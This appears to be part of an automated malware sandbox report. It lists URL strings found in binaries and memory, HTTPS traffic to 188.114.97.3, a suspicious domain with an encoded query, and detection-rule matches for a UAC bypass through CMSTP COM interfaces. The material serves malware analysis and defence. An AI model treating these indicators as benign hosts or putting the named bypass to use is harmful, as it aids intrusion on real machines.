                  Source: TVr2Z822J3.exe, 00000006.00000003.1295199028.000000000344E000.00000004.00000020.00020000.00000000.sdmp, TVr2Z822J3.exe, 00000006.00000003.1295199028.0000000002E34000.00000004.00000020.00020000.00000000.sdmp, TVr2Z822J3.exe, 00000006.00000003.1295199028.00000000026C9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000003.1328200308.000001AD62FAB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
                  Source: cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                  Source: ActiveISO.exe, 00000008.00000002.1338281133.000001AD62440000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1419280539.000002B7CE542000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                  Source: ActiveISO.exe, 00000008.00000002.1338281133.000001AD62440000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1419280539.000002B7CE542000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://s2.symcb.com0
                  Source: cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                  Source: cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
                  Source: cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                  Source: ActiveISO.exe, 00000008.00000002.1338281133.000001AD62440000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1419280539.000002B7CE542000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crl0a
                  Source: ActiveISO.exe, 00000008.00000002.1338281133.000001AD62440000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1419280539.000002B7CE542000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt0
                  Source: ActiveISO.exe, 00000008.00000002.1338281133.000001AD62440000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1419280539.000002B7CE542000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://sv.symcd.com0&
                  Source: TVr2Z822J3.exe, 00000006.00000003.1295199028.000000000344E000.00000004.00000020.00020000.00000000.sdmp, TVr2Z822J3.exe, 00000006.00000003.1295199028.0000000002E34000.00000004.00000020.00020000.00000000.sdmp, TVr2Z822J3.exe, 00000006.00000003.1295199028.00000000026C9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000003.1328200308.000001AD62FAB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
                  Source: TVr2Z822J3.exe, 00000006.00000003.1295199028.000000000344E000.00000004.00000020.00020000.00000000.sdmp, TVr2Z822J3.exe, 00000006.00000003.1295199028.0000000002E34000.00000004.00000020.00020000.00000000.sdmp, TVr2Z822J3.exe, 00000006.00000003.1295199028.00000000026C9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000003.1328200308.000001AD62FAB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://t2.symcb.com0
                  Source: TVr2Z822J3.exe, 00000006.00000003.1295199028.000000000344E000.00000004.00000020.00020000.00000000.sdmp, TVr2Z822J3.exe, 00000006.00000003.1295199028.0000000002E34000.00000004.00000020.00020000.00000000.sdmp, TVr2Z822J3.exe, 00000006.00000003.1295199028.00000000026C9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000003.1328200308.000001AD62FAB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://tl.symcb.com/tl.crl0
                  Source: TVr2Z822J3.exe, 00000006.00000003.1295199028.000000000344E000.00000004.00000020.00020000.00000000.sdmp, TVr2Z822J3.exe, 00000006.00000003.1295199028.0000000002E34000.00000004.00000020.00020000.00000000.sdmp, TVr2Z822J3.exe, 00000006.00000003.1295199028.00000000026C9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000003.1328200308.000001AD62FAB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://tl.symcb.com/tl.crt0
                  Source: TVr2Z822J3.exe, 00000006.00000003.1295199028.000000000344E000.00000004.00000020.00020000.00000000.sdmp, TVr2Z822J3.exe, 00000006.00000003.1295199028.0000000002E34000.00000004.00000020.00020000.00000000.sdmp, TVr2Z822J3.exe, 00000006.00000003.1295199028.00000000026C9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000003.1328200308.000001AD62FAB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://tl.symcd.com0&
                  Source: TVr2Z822J3.exe, 00000006.00000003.1295199028.000000000344E000.00000004.00000020.00020000.00000000.sdmp, TVr2Z822J3.exe, 00000006.00000003.1295199028.0000000002E34000.00000004.00000020.00020000.00000000.sdmp, TVr2Z822J3.exe, 00000006.00000003.1295199028.00000000026C9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000003.1328200308.000001AD62FAB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                  Source: TVr2Z822J3.exe, 00000006.00000003.1295199028.000000000344E000.00000004.00000020.00020000.00000000.sdmp, TVr2Z822J3.exe, 00000006.00000003.1295199028.0000000002E34000.00000004.00000020.00020000.00000000.sdmp, TVr2Z822J3.exe, 00000006.00000003.1295199028.00000000026C9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000003.1328200308.000001AD62FAB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                  Source: TVr2Z822J3.exe, 00000006.00000003.1295199028.000000000344E000.00000004.00000020.00020000.00000000.sdmp, TVr2Z822J3.exe, 00000006.00000003.1295199028.0000000002E34000.00000004.00000020.00020000.00000000.sdmp, TVr2Z822J3.exe, 00000006.00000003.1295199028.00000000026C9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000003.1328200308.000001AD62FAB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                  Source: ActiveISO.exe, 00000008.00000002.1338281133.000001AD62440000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1419280539.000002B7CE542000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.???.xx/?search=%s
                  Source: TVr2Z822J3.exe, 00000006.00000003.1295199028.0000000002E34000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1361209065.00007FFB0C1E8000.00000002.00000001.01000000.00000008.sdmp, ActiveISO.exe, 0000000A.00000002.1429841224.00007FFB0A168000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.aiim.org/pdfa/ns/id/
                  Source: TVr2Z822J3.exe, 00000006.00000003.1295199028.0000000002E34000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1361209065.00007FFB0C1E8000.00000002.00000001.01000000.00000008.sdmp, ActiveISO.exe, 0000000A.00000002.1429841224.00007FFB0A168000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.color.org)
                  Source: ActiveISO.exe, 00000008.00000002.1338281133.000001AD62440000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1419280539.000002B7CE542000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                  Source: ActiveISO.exe, 00000008.00000002.1338281133.000001AD623EA000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1419280539.000002B7CE4EC000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655004423.0000000004FEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.info-zip.org/
                  Source: ActiveISO.exe, 0000000A.00000002.1428048059.00007FF6B2023000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.lsoft.net
                  Source: ActiveISO.exe, ActiveISO.exe, 0000000A.00000000.1335251768.00007FF6B203B000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.lsoft.net/act/update.aspx?pid=%1&ver=%2&os=%3
                  Source: ActiveISO.exe, 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmp, ActiveISO.exe, 0000000A.00000000.1335251768.00007FF6B203B000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.lsoft.net/act/update.aspx?pid=%1&ver=%2&os=%31DownloadInfo(QString)2DownloadInfo(QString)
                  Source: ActiveISO.exe, 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmp, ActiveISO.exe, 0000000A.00000000.1335251768.00007FF6B203B000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.lsoft.net/act/update.aspx?pid=%1&ver=%2&os=%31GotLatestVersion(QString)2LatestVersion(QSt
                  Source: ActiveISO.exe, 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmp, ActiveISO.exe, 0000000A.00000000.1335251768.00007FF6B203B000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.lsoft.net/act/update.aspx?pid=%1&ver=%2&os=%31LatestVersion(QString)2LatestVersion(QStrin
                  Source: ActiveISO.exe, 0000000A.00000002.1428048059.00007FF6B2023000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.ntfs.com/iso_file_manager.htm
                  Source: TVr2Z822J3.exe, 00000006.00000003.1295199028.000000000344E000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1360603475.00007FFB0BDDA000.00000002.00000001.01000000.00000009.sdmp, ActiveISO.exe, 0000000A.00000002.1429231054.00007FFB09D5A000.00000002.00000001.01000000.00000015.sdmpString found in binary or memory: http://www.phreedom.org/md5)
                  Source: TVr2Z822J3.exe, 00000006.00000003.1295199028.000000000344E000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1360603475.00007FFB0BDDA000.00000002.00000001.01000000.00000009.sdmp, ActiveISO.exe, 0000000A.00000002.1429231054.00007FFB09D5A000.00000002.00000001.01000000.00000015.sdmpString found in binary or memory: http://www.phreedom.org/md5)08:27
                  Source: ActiveISO.exe, 00000008.00000002.1338281133.000001AD62440000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1419280539.000002B7CE542000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.softwareok.com
                  Source: cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000000.1612798615.00000001401F4000.00000002.00000001.01000000.0000001D.sdmpString found in binary or memory: http://www.softwareok.com/?Download=Find.Same.Images.OK
                  Source: cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000000.1612798615.00000001401F4000.00000002.00000001.01000000.0000001D.sdmpString found in binary or memory: http://www.softwareok.com/?Freeware/Find.Same.Images.OK
                  Source: cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000000.1612798615.00000001401F4000.00000002.00000001.01000000.0000001D.sdmpString found in binary or memory: http://www.softwareok.com/?Freeware/Find.Same.Images.OK/History
                  Source: cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000000.1612798615.00000001401F4000.00000002.00000001.01000000.0000001D.sdmpString found in binary or memory: http://www.softwareok.com/?seite=faq-Find.Same.Images.OK&faq=0
                  Source: ActiveISO.exe, 00000008.00000002.1338281133.000001AD62440000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1419280539.000002B7CE542000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.softwareok.de
                  Source: cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000000.1612798615.00000001401F4000.00000002.00000001.01000000.0000001D.sdmpString found in binary or memory: http://www.softwareok.de/?Download=Find.Same.Images.OK
                  Source: cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000000.1612798615.00000001401F4000.00000002.00000001.01000000.0000001D.sdmpString found in binary or memory: http://www.softwareok.de/?Freeware/Find.Same.Images.OK
                  Source: cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000000.1612798615.00000001401F4000.00000002.00000001.01000000.0000001D.sdmpString found in binary or memory: http://www.softwareok.de/?Freeware/Find.Same.Images.OK/History
                  Source: cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000000.1612798615.00000001401F4000.00000002.00000001.01000000.0000001D.sdmpString found in binary or memory: http://www.softwareok.de/?seite=faq-Find.Same.Images.OK&faq=0
                  Source: UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.surfok.de/
                  Source: ActiveISO.exe, 00000008.00000002.1338281133.000001AD62440000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1419280539.000002B7CE542000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
                  Source: ActiveISO.exe, 00000008.00000002.1338281133.000001AD62440000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1419280539.000002B7CE542000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
                  Source: ActiveISO.exe, 00000008.00000002.1338281133.000001AD62440000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1419280539.000002B7CE542000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0
                  Source: ActiveISO.exe, 00000008.00000002.1338281133.000001AD62440000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1419280539.000002B7CE542000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0/
                  Source: ActiveISO.exe, 00000008.00000002.1338281133.000001AD62440000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1419280539.000002B7CE542000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
                  Source: ActiveISO.exe, 00000008.00000002.1338281133.000001AD62440000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1419280539.000002B7CE542000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
                  Source: ActiveISO.exe, 00000008.00000003.1327357565.000001AD5F9BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                  Source: UploadAlt_Ti.exe, 0000000F.00000003.1784459699.0000000000585000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sirnisirlo.online/book-review-dixie-betrayed-by-david-j.html?wyqg4gfr=cq78MM938kuJ2nKgWAxh4z
                  Source: UploadAlt_Ti.exe, 0000000F.00000002.1959820013.0000000000546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sirnisirlo.online:443
                  Source: UploadAlt_Ti.exe, 0000000F.00000003.1784459699.0000000000585000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sirnisirlo.online:443/book-review-dixie-betrayed-by-david-j.html?wyqg4gfr=cq78MM938kuJ2nKgWA
                  Source: UploadAlt_Ti.exe, 0000000F.00000002.1970127366.0000000007F18000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
                  Source: ActiveISO.exe, 00000008.00000002.1338281133.000001AD62440000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1419280539.000002B7CE542000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                  Source: cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                  Source: ActiveISO.exe, ActiveISO.exe, 0000000A.00000000.1335251768.00007FF6B203B000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://www.lsoft.net/act/
                  Source: ActiveISO.exe, 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmp, ActiveISO.exe, 0000000A.00000000.1335251768.00007FF6B203B000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://www.lsoft.net/act/1DeRegister()2released()Deactivation
                  Source: ActiveISO.exe, 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmp, ActiveISO.exe, 0000000A.00000000.1335251768.00007FF6B203B000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://www.lsoft.net/act/We
                  Source: UploadAlt_Ti.exe, 0000000F.00000002.1970127366.0000000007F18000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                  Source: TVr2Z822J3.exe, 00000006.00000003.1295199028.000000000344E000.00000004.00000020.00020000.00000000.sdmp, TVr2Z822J3.exe, 00000006.00000003.1295199028.0000000002E34000.00000004.00000020.00020000.00000000.sdmp, TVr2Z822J3.exe, 00000006.00000003.1295199028.00000000026C9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000003.1328200308.000001AD62FAB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.thawte.com/cps0/
                  Source: TVr2Z822J3.exe, 00000006.00000003.1295199028.000000000344E000.00000004.00000020.00020000.00000000.sdmp, TVr2Z822J3.exe, 00000006.00000003.1295199028.0000000002E34000.00000004.00000020.00020000.00000000.sdmp, TVr2Z822J3.exe, 00000006.00000003.1295199028.00000000026C9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000003.1328200308.000001AD62FAB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.thawte.com/repository0W
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49267 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49202
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49265 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49267
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49266
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49265
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49264
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49241
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49263
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49202 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49263 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49180
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49258 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49191 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49218
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49218 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49258
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49266 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49234
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49180 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49251
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49264 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49191
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49241 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49234 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49251 -> 443
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49180 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49191 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49202 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49218 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49234 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49241 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49251 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49258 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49263 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49264 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49265 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49266 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49267 version: TLS 1.2

                  System Summary

                  barindex
                  Source: 17.2.cmd.exe.2d84a78.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 27.2.UploadAlt_Ti.exe.26b5a20.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 27.2.UploadAlt_Ti.exe.26faaed.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 25.2.cmd.exe.509e6cd.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 17.2.cmd.exe.4d6facd.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 11.2.cmd.exe.503da00.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 15.2.UploadAlt_Ti.exe.26a2aed.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 17.2.cmd.exe.2db07f8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 25.2.cmd.exe.5058a00.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 27.2.UploadAlt_Ti.exe.26fb6ed.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 17.2.cmd.exe.4d2aa00.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 15.2.UploadAlt_Ti.exe.26a36ed.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 25.2.cmd.exe.509dacd.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
